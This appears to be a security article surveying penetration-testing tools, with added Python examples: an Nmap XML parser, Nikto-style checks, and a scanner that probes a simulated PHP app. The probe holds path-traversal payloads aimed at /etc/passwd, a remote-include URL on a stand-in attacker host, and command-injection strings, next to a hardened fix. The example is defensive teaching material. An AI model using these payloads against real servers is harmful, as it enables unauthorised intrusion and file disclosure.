Almost every tool mentioned here is bundled with Kali Linux, but most can be run on other operating systems, including Windows. Again – we don’t intend to publish lengthy tutorials. Instead, we insist that you do some serious research on your own, or you will learn almost nothing. Consider this list a starting point for further discoveries.
Nmap
Nmap is a whole universe of its own. Features include host discovery, port scanning, version detection, OS detection and scriptable interaction with the target(s) through the Nmap Scripting Engine (NSE). The tool can further report DNS names, device types and MAC addresses, and its -oX option writes everything it found as XML, which is the form to use when feeding results into other tooling. This Nmap cheat sheet is very useful when learning to master the program and its capabilities.
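As an added example (not part of Nmap), here is a parser that turns Nmap's XML output into a per-host summary of addresses, hostnames, best OS match and open services. The XML is constructed to mirror the -oX layout; the host, MAC address, vendor string and version numbers are invented.

```python
"""Summarize Nmap XML output (nmap -oX) into a per-host report.

Added example, not part of Nmap itself. SAMPLE_NMAP_XML is constructed to
mirror the -oX structure (addresses, hostnames, ports/services, osmatch);
the host, MAC, vendor and versions are invented.
"""
import xml.etree.ElementTree as ET

SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -O -oX scan.xml 192.0.2.10" version="7.94">
  <host>
    <status state="up" reason="arp-response"/>
    <address addr="192.0.2.10" addrtype="ipv4"/>
    <address addr="00:11:22:33:44:55" addrtype="mac" vendor="ExampleNIC"/>
    <hostnames>
      <hostname name="web01.example.test" type="PTR"/>
    </hostnames>
    <ports>
      <port protocol="tcp" portid="22">
        <state state="open" reason="syn-ack"/>
        <service name="ssh" product="OpenSSH" version="8.9p1" method="probed" conf="10"/>
      </port>
      <port protocol="tcp" portid="80">
        <state state="open" reason="syn-ack"/>
        <service name="http" product="Apache httpd" version="2.4.52" method="probed" conf="10"/>
      </port>
      <port protocol="tcp" portid="443">
        <state state="filtered" reason="no-response"/>
        <service name="https" method="table" conf="3"/>
      </port>
    </ports>
    <os>
      <osmatch name="Linux 5.X" accuracy="96"/>
      <osmatch name="Linux 4.15 - 5.6" accuracy="93"/>
    </os>
  </host>
</nmaprun>
"""


def parse_nmap_xml(xml_text):
    """Return one dict per host that Nmap reported as up."""
    hosts = []
    for host in ET.fromstring(xml_text).findall("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue
        info = {"ip": None, "mac": None, "vendor": None,
                "hostnames": [], "os": None, "ports": []}
        for addr in host.findall("address"):
            if addr.get("addrtype") in ("ipv4", "ipv6"):
                info["ip"] = addr.get("addr")
            elif addr.get("addrtype") == "mac":
                info["mac"] = addr.get("addr")
                info["vendor"] = addr.get("vendor")
        info["hostnames"] = [h.get("name") for h in host.iter("hostname")]
        # Keep only the highest-accuracy OS guess, if OS detection ran at all.
        matches = host.findall("os/osmatch")
        if matches:
            best = max(matches, key=lambda m: int(m.get("accuracy", "0")))
            info["os"] = best.get("name")
        for port in host.findall("ports/port"):
            svc = port.find("service")
            service = ""
            conf = 0
            if svc is not None:
                service = " ".join(filter(None, [svc.get("name"), svc.get("product"), svc.get("version")]))
                # conf below 10 means the name came from the nmap-services table, not a probe
                conf = int(svc.get("conf", "0"))
            info["ports"].append({"port": int(port.get("portid")),
                                  "proto": port.get("protocol"),
                                  "state": port.find("state").get("state"),
                                  "service": service, "confidence": conf})
        hosts.append(info)
    return hosts


def open_ports(host):
    return [p["port"] for p in host["ports"] if p["state"] == "open"]


def find_product(hosts, needle):
    """Search every host's service strings for a product, e.g. 'OpenSSH'."""
    hits = []
    for h in hosts:
        for p in h["ports"]:
            if needle.lower() in p["service"].lower():
                hits.append((h["ip"], p["port"], p["service"]))
    return hits


if __name__ == "__main__":
    for h in parse_nmap_xml(SAMPLE_NMAP_XML):
        print(h["ip"], h["mac"], h["vendor"], h["hostnames"], h["os"])
        for p in h["ports"]:
            print("  %d/%s %s %s (conf %d)" % (p["port"], p["proto"], p["state"], p["service"], p["confidence"]))
```

The confidence value is worth keeping: a service name that came only from the port-number table (conf 3) is a guess, while a probed banner (conf 10) is something you can actually act on.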
Uniscan
Uniscan is a web vulnerability scanner. Its foremost strengths are discovering Remote File Inclusion (RFI), Local File Inclusion (LFI) and Remote Command Execution (RCE) vulnerabilities. Even though it hasn't been updated for several years, many people still consider it one of the most useful penetration testing tools; treat its findings as leads to confirm by hand rather than as final results, since its signatures are no longer maintained.
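To show what an LFI/RFI/RCE probe actually does, here is an added example (not Uniscan's code) of the scanner side next to a constructed target. The target is a stand-in for a PHP app with a page.php that does include($_GET['page']) and a ping.php that does system("ping " . $_GET['host']); the fake filesystem, the attacker.test URL and the RFI marker string are invented. A hardened version of the same two endpoints is included so the probe can be run against both.

```python
"""Probe one URL parameter for LFI, RFI and command injection the way a
scanner does: send payloads, look for signatures in the response body.

Added example, not Uniscan's code. vulnerable_app/hardened_app are
constructed stand-ins for a PHP application; FAKE_FS, FAKE_REMOTE, the
attacker.test URL and the marker string are invented.
"""
import posixpath
import re

# --- scanner side -------------------------------------------------------------
LFI_PAYLOADS = ["../../../../etc/passwd", "/etc/passwd"]
LFI_SIGNATURE = re.compile(r"^root:x:0:0:", re.M)
RFI_PAYLOAD = "http://attacker.test/marker.txt"   # hypothetical scanner-hosted file
RFI_MARKER = "RFI-MARKER-7e1c9a"                    # what that file would contain
RCE_PAYLOADS = [";id", "|id", "`id`", "$(id)"]
RCE_SIGNATURE = re.compile(r"uid=\d+\([\w-]+\)")


def probe_parameter(fetch, url, param, benign_value):
    """fetch(url, params) -> response body. Returns [(vuln_class, payload), ...]."""
    findings = []
    for payload in LFI_PAYLOADS:
        if LFI_SIGNATURE.search(fetch(url, {param: payload})):
            findings.append(("LFI", payload))
            break
    if RFI_MARKER in fetch(url, {param: RFI_PAYLOAD}):
        findings.append(("RFI", RFI_PAYLOAD))
    for payload in RCE_PAYLOADS:
        # Append to a valid value so the request is otherwise well-formed.
        if RCE_SIGNATURE.search(fetch(url, {param: benign_value + payload})):
            findings.append(("RCE", payload))
            break
    return findings


# --- constructed target -------------------------------------------------------
WEBROOT = "/var/www/pages"
FAKE_FS = {
    "/var/www/pages/home.html": "<h1>Welcome</h1>",
    "/etc/passwd": "root:x:0:0:root:/root:/bin/bash\nwww-data:x:33:33::/var/www:/usr/sbin/nologin\n",
}
FAKE_REMOTE = {RFI_PAYLOAD: RFI_MARKER + "\n"}


def fake_shell(cmdline):
    """Stand-in for system(): knows only 'ping' and 'id', honours shell metacharacters."""
    out = []
    for cmd in re.split(r"[;|`]|\$\(|\)", cmdline):
        cmd = cmd.strip()
        if cmd.startswith("ping "):
            out.append("PING " + cmd.split()[-1])
        elif cmd == "id":
            out.append("uid=33(www-data) gid=33(www-data) groups=33(www-data)")
    return "\n".join(out)


def vulnerable_app(url, params):
    if url.endswith("/page.php"):
        page = params.get("page", "home.html")
        if page.startswith(("http://", "https://")):          # allow_url_include=On
            return FAKE_REMOTE.get(page, "")
        path = posixpath.normpath(posixpath.join(WEBROOT, page))  # no containment check
        return FAKE_FS.get(path, "404 Not Found")
    if url.endswith("/ping.php"):
        return fake_shell("ping -c 1 " + params.get("host", ""))  # raw string into a shell
    return "404 Not Found"


PAGES = {"home": "/var/www/pages/home.html"}   # allowlist keyed by a logical name
HOST_RE = re.compile(r"[A-Za-z0-9.-]{1,253}")


def hardened_app(url, params):
    if url.endswith("/page.php"):
        path = PAGES.get(params.get("page", "home"))   # unknown key -> nothing is included
        return FAKE_FS[path] if path else "404 Not Found"
    if url.endswith("/ping.php"):
        host = params.get("host", "")
        if not HOST_RE.fullmatch(host):                 # reject before anything reaches a shell
            return "400 Bad Request"
        # Real code would use subprocess.run(["ping", "-c", "1", host]) with an argv list, never shell=True.
        return fake_shell("ping -c 1 " + host)
    return "404 Not Found"


if __name__ == "__main__":
    print(probe_parameter(vulnerable_app, "http://target.test/page.php", "page", "home.html"))
    print(probe_parameter(vulnerable_app, "http://target.test/ping.php", "host", "10.0.0.1"))
    print(probe_parameter(hardened_app, "http://target.test/page.php", "page", "home"))
    print(probe_parameter(hardened_app, "http://target.test/ping.php", "host", "10.0.0.1"))
```

Note what the probe does not do: it stops at the first payload that matches, and a blind injection (no output reflected) would go unnoticed, which is one reason scanner results need manual confirmation.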
Nikto
Nikto is a web server scanner which performs comprehensive tests against web servers for multiple items, including potentially dangerous files and CGIs, outdated server versions, and version-specific problems. It also checks server configuration items such as the presence of multiple index files and the HTTP methods the server allows, and attempts to identify installed web servers and software. Scan items and its exceptionally useful plugins are updated frequently. Keep in mind that Nikto is not designed to be stealthy: it sends thousands of requests and will show up in any web server log or IDS.
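An added example (not Nikto's code) of the kind of checks it runs, applied to captured responses rather than a live server: extract and grade version banners, flag risky methods from an OPTIONS reply, and look for multiple index files and well-known sensitive paths. The two responses and the path table are constructed; the version floors are illustrative (Apache 2.2 and PHP 5.x are long end-of-life, but a real scanner carries a full signature database, not two entries).

```python
"""Nikto-style checks over captured HTTP responses: banner versions,
permitted methods, multiple index files and exposed sensitive paths.

Added example, not Nikto's code. HEAD_RESPONSE, OPTIONS_RESPONSE and
FAKE_SITE are constructed; MIN_VERSIONS holds illustrative thresholds.
"""
import re

HEAD_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache/2.2.15 (CentOS)\r\n"
    "X-Powered-By: PHP/5.3.3\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
)
OPTIONS_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache/2.2.15 (CentOS)\r\n"
    "Allow: GET,HEAD,POST,OPTIONS,TRACE\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)
# Constructed target: path -> status code a GET would return
FAKE_SITE = {"/": 200, "/index.html": 200, "/index.php": 200, "/phpinfo.php": 200,
             "/.git/HEAD": 200, "/admin/": 403, "/backup.zip": 404}

MIN_VERSIONS = {"apache": (2, 4), "php": (7, 4)}   # illustrative: older than this is EOL
RISKY_METHODS = {"TRACE", "PUT", "DELETE", "CONNECT"}
INDEX_FILES = ["/index.html", "/index.htm", "/index.php", "/default.asp"]
SENSITIVE_PATHS = ["/phpinfo.php", "/.git/HEAD", "/.env", "/backup.zip", "/server-status"]


def parse_response(raw):
    """Split a raw HTTP response into (status code, lower-cased header dict)."""
    head, _, _body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    status = int(lines[0].split()[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers


def version_tuple(s):
    return tuple(int(x) for x in s.split("."))


def check_banners(headers):
    """Report disclosed product/version banners and grade them against MIN_VERSIONS."""
    findings = []
    for header in ("server", "x-powered-by"):
        banner = headers.get(header, "")
        m = re.match(r"([A-Za-z][\w-]*)/(\d+(?:\.\d+)*)", banner)
        if not m:
            continue
        product, version = m.group(1), m.group(2)
        findings.append(("version disclosure", header, banner))
        floor = MIN_VERSIONS.get(product.lower())
        if floor and version_tuple(version) < floor:
            findings.append(("outdated", product, version))
    return findings


def check_methods(headers):
    """Intersect the Allow header from OPTIONS with methods that are rarely needed."""
    allowed = {m.strip().upper() for m in headers.get("allow", "").split(",") if m.strip()}
    return sorted(allowed & RISKY_METHODS)


def check_paths(site):
    """site(path) -> status code. Flags multiple index files and reachable sensitive paths."""
    findings = []
    present = [p for p in INDEX_FILES if site(p) == 200]
    if len(present) > 1:
        findings.append(("multiple index files", present))
    for p in SENSITIVE_PATHS:
        if site(p) == 200:
            findings.append(("exposed", p))
    return findings


def run_checks(head_raw, options_raw, site):
    _, head_h = parse_response(head_raw)
    _, opt_h = parse_response(options_raw)
    return {"banners": check_banners(head_h),
            "risky_methods": check_methods(opt_h),
            "paths": check_paths(site)}


if __name__ == "__main__":
    report = run_checks(HEAD_RESPONSE, OPTIONS_RESPONSE, lambda p: FAKE_SITE.get(p, 404))
    for section, items in report.items():
        print(section, items)
```

A server that answers OPTIONS with TRACE in its Allow list is the classic cross-site tracing finding; a 200 on /.git/HEAD usually means the whole repository, history included, can be pulled down.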
Metasploit Framework
The Metasploit Project is a security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development. Its best-known sub-project is the Metasploit Framework, a platform for developing and executing exploit code against remote targets. The project is also known for its anti-forensic and evasion tools.
Burp Suite
Burp Suite is written in Java and has a convenient graphical user interface. It is a comprehensive solution for web application security testing. Besides the core intercepting proxy, scanner and Intruder, it contains the Spider, Repeater, Decoder, Comparer, Extender and Sequencer tools. It comes in two versions, a Free edition and a full version (Pro); the free edition is surprisingly powerful, although the automated scanner is Pro-only and Intruder is rate-limited in the free edition.
OWASP ZAP
OWASP ZAP is an open-source web application security scanner. It is intended for both newcomers to application security and professional penetration testers. Built-in features include an intercepting proxy, traditional and AJAX web crawlers, an automated (active) scanner, a passive scanner, forced browsing, a fuzzer, WebSocket support, scripting support and "plug-n-hack" support. It has a plugin-based architecture and an online marketplace through which new or updated features can be added. The GUI is fairly easy to use.
Arachni
Arachni is a feature-rich, modular, high-performance Ruby framework aimed at helping penetration testers and administrators evaluate the security of modern web applications. It is free, with its source code public and available for review. It scales from a simple command-line scanner, to a distributed grid of scanners, to a Ruby library for scripted audits, to a multi-user, multi-scan web collaboration platform. It also has a REST API that makes integration with other applications possible. It is smart in the sense that it trains itself from the HTTP responses it receives during the audit and performs meta-analysis on a number of factors to assess the trustworthiness of results and weed out false positives.